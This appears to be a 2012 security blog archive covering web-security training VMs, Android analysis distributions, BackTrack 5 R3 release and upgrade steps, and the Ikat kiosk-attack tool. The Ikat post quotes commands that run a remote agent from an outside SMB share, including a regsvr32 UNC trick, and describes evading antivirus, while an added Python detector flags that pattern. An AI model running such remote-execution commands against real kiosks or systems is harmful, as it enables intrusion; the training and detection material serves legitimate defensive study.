
Tuesday, August 28, 2012

GameOver: a distribution for web security training



GameOver is a project that aims to train and educate newcomers in basic web security and help them understand the main existing web attacks. It is a Voyage Linux distribution (based on Debian) whose applications are divided into two sections:

Section 1. Collection of web applications designed specifically to teach the basics of web security, covering XSS, CSRF, RFI and LFI, brute-force authentication, path traversal, command execution and SQL injection:

1. Damn Vulnerable Web Application
2. OWASP WebGoat
3. Ghost
4. Mutillidae
5. Zap-Wave

Section 2. Collection of deliberately insecure applications to practice and test our skills before conducting a penetration test in a real environment: 

1. Owasp Hacademic Challenges
2. Vicnum Owasp 
3. WackoPicko
4. Owasp Insecure Web App
5. BodgeIT
6. PuzzleMall
7. WAVSEP

To test it, you can download the virtual machine (the VM needs Player 4.0.2 or higher and at least 256 MB of RAM) or a LiveCD ISO:

username : root 
password : gameover

Ikat VI: new version of the popular tool to attack Internet kiosks



On August 15, during the XCon2012 conference in Beijing, Paul Craig officially launched the 2012 revision, or version VI, of Ikat (The Interactive Kiosk Attack Tool), the de facto standard for penetration testing in restricted environments such as Citrix terminals, webTVs and kiosks for Internet access, photo printing, and directories in airports, museums, etc. Ikat is very easy to use (we could clumsily call it "graphical hacking"), is 100% free and is presented as a SaaS (software as a service) website that you can visit from any browser in order to exploit the kiosk in question and get a system console. The URL is http://adf.ly/CKa3z, and there are now versions for Windows and Linux, plus another called PhotoKAT, designed to exploit any system that allows a USB device or memory card to be inserted (usually photo printing terminals).

One of the biggest changes is the implementation of a client-server model, which includes an agent in each payload that establishes a reverse connection to the Ikat server, which then handles all post-exploitation tasks. This is intended to evade blocking by antivirus products and kiosk manufacturers since, as you can imagine, his tools were already at the top of their blacklists. Another highlight is the publication of a read-only SMB share containing the agent, its library and various tools. This way the agent can be run simply by launching \\120.138.22.77\ikat\ikat.exe from the command line, or by registering its library with regsvr32 \\120.138.22.77\ikat\ikat.dll, which is very useful when commands can be executed but files cannot be downloaded. In addition, there is integration with Metasploit Browser AutoPWN, new techniques, more exploits, tools, browser plug-ins, PDF/Office files and endless "tricks" to compromise such environments. So beware if you print your photos or connect to the Internet at an Internet cafe or at a kiosk in a hotel because you will see them with different eyes now, won't you? lol
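
From the defender's side, the two launch methods described above (a binary started straight from an SMB share, and a library registered with regsvr32 from a UNC path) leave a recognisable shape in process-creation logs. The following is an added example, not code from the original post or from Ikat; the host names, the allowlist and the sample command lines are constructed for illustration.

```python
import re

# Assumption: file servers that legitimately host binaries (hypothetical name).
ALLOWED_HOSTS = {"fileserver01.corp.example"}

# \\host\share\path\name.ext, where ext is an executable or library type.
UNC_BINARY = re.compile(
    r'\\\\(?P<host>[^\\/\s"]+)\\(?P<share>[^\\/\s"]+)\\'
    r'(?P<path>[^\s"]*?\.(?P<ext>exe|dll|ocx|scr|com|bat|cmd))(?=$|[\s"])',
    re.IGNORECASE,
)
IP_LITERAL = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

# Constructed process-creation command lines (not taken from real logs).
SAMPLE_EVENTS = [
    r'\\192.0.2.10\tools\agent.exe',
    r'regsvr32 \\192.0.2.10\tools\agent.dll',
    r'"C:\Windows\System32\regsvr32.exe" /s C:\Windows\System32\scrrun.dll',
    r'\\fileserver01.corp.example\apps\setup.exe /quiet',
    r'cmd.exe /c copy \\192.0.2.10\tools\agent.exe C:\Temp',
]

def classify(command_line):
    """Return one finding per remote binary referenced in a command line."""
    cl = command_line.strip()
    tokens = cl.split()
    image = tokens[0].strip('"').lower().rsplit("\\", 1)[-1] if tokens else ""
    findings = []
    for m in UNC_BINARY.finditer(cl):
        host = m.group("host").lower()
        if host in ALLOWED_HOSTS:
            continue  # known software distribution share
        ext = m.group("ext").lower()
        if cl[:m.start()].strip('"') == "":
            rule = "remote-image-exec"        # binary started straight from the share
        elif image in ("regsvr32", "regsvr32.exe") and ext in ("dll", "ocx"):
            rule = "regsvr32-remote-library"  # library registered from the share
        else:
            rule = "remote-binary-argument"   # remote binary passed to another tool
        findings.append({"rule": rule, "host": host,
                         "ip_literal": bool(IP_LITERAL.fullmatch(host))})
    return findings

def scan(events):
    """Return (event index, finding) pairs for every flagged command line."""
    return [(i, f) for i, e in enumerate(events) for f in classify(e)]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```

A UNC host given as a raw IP address, as in the post, is reported separately through `ip_literal` because managed software shares are normally addressed by name.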

ARE: VM for Android malware analysis



ARE (Android Reverse Engineering) is a virtual machine with an interesting set of tools for analyzing different artifacts of Android malware in a secure environment. The image, developed by a French group of the Honeynet Project, runs in VirtualBox and comprises 10 tools, including Androguard and the Android SDK:

Androguard
Android SDK / NDK
APKInspector
Apktool
Axmlprinter
Ded
Dex2jar
Droidbox
Jad
Smali / Baksmali
Project website: http://redmine.honeynet.org/projects/are/wiki

Santoku Linux Mobile Forensic & Security Distribution



Santoku is a platform for mobile forensics, mobile malware analysis and mobile application security assessment. The free Santoku Community Edition is a collaborative project to provide a pre-configured Linux environment with utilities, drivers and guides for these areas. The alpha release is based on a fork of the OWASPMobiSec distro.

The word santoku loosely translates as ‘three virtues’ or ‘three uses’. Santoku Linux has been crafted to support you in three endeavours:

Mobile Forensics
Tools to acquire and analyze data

Firmware flashing tools for multiple manufacturers
Imaging tools for NAND, media cards, and RAM
Free versions of some commercial forensics tools
Useful scripts and utilities specifically designed for mobile forensics 

Mobile Malware
Tools for examining mobile malware

Mobile device emulators
Utilities to simulate network services for dynamic analysis
Decompilation and disassembly tools
Access to malware databases 

Mobile Security
Assessment of mobile apps

Decompilation and disassembly tools
Scripts to detect common issues in mobile applications
Scripts to automate decrypting binaries, deploying apps, enumerating app details, and more 

Development Tools:
Android SDK Manager
BlackBerry JDE
BlackBerry Tablet OS SDK
BlackBerry WebWorks
DroidBox
Eclipse IDE
Windows Phone SDK
Android 2.3.3, 3.2, and 4.0.3 Emulators
SecurityCompass Lab Server (HTTP and HTTPS)
BlackBerry Ripple
BlackBerry Simulators
Penetration Testing:
CeWL
DirBuster
Fierce
Nikto
nmap
Burp Suite
Mallory
w3af Console
w3af GUI
ZAP
BeEF
Ettercap
iSniff
Metasploit Console
Metasploit GUI
NetSed
SET
SQLMap
SSLStrip
Reverse Engineering:
APK Tool
Dex2Jar
Flawfinder
Java Decompiler
Strace
Wireless Analyzers:
Aircrack-ng
Kismet
Ubertooth Kismet
Ubertooth Spectrum Analyzer
Wireshark
Device Forensics:
AFLogical Open Source Edition
Android Encryption Brute Force
BitPim
BlackBerry Desktop Manager
Foremost
iPhone Backup Analyzer
MIAT
Paraben Device Seizure
Sift Workstation
Sleuth Kit
SQLiteSpy
Mobile Infrastructure:
BES Express
Google Mobile Management
iPhone Configuration Tool

DOWNLOAD Santoku Community Edition 

Tuesday, August 21, 2012

How To Upgrade From BackTrack 5 R2 to BackTrack 5 R3



Recently, we released the long-awaited BackTrack 5 R3, but for those of you who don’t want to start fresh with a new installation, have no fear because you can easily upgrade your existing installation of R2 to R3.

Our primary focus with this release was on the implementation of various bug fixes, numerous tools upgrades and well over 60 new additions to the BackTrack suite. Because of this, the upgrade path to BackTrack 5 R3 is relatively quick and painless.

First, you will want to make sure that your existing system is fully updated:

apt-get update && apt-get dist-upgrade

With the dist-upgrade finished, all that remains is to install the new tools that have been added for R3. An important point to keep in mind is that there are slight differences between the 32-bit and 64-bit tools, so make sure you choose the right one.

32-Bit Tools

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

64-Bit Tools:


apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

That’s all there is to it! Once the new tools have been installed, you are up and running with BackTrack 5 R3. As always, if you come across any bugs or issues, please submit tickets via our BackTrack Redmine Tracker.

Monday, August 13, 2012

BackTrack 5 R3 released


The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.

Building, testing and releasing a new BackTrack revision is never an easy task. Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtrack lover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

We would like to thank Offensive Security for providing the BackTrack dev team with the funding and resources to make all of this happen. Also, a very special thanks to Dookie, our lead developer – for building, testing and packaging most of the new tools in this release.

Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.

Lastly, if you’re looking for intensive, real world, hands on Penetration Testing Training – make sure to drop by Offensive Security Training, and learn the meaning of “TRY HARDER“.

For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. 

BT5R3-GNOME-64.torrent  (md5: 8cd98b693ce542b671edecaed48ab06d)
BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)
BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)
BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)
BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)
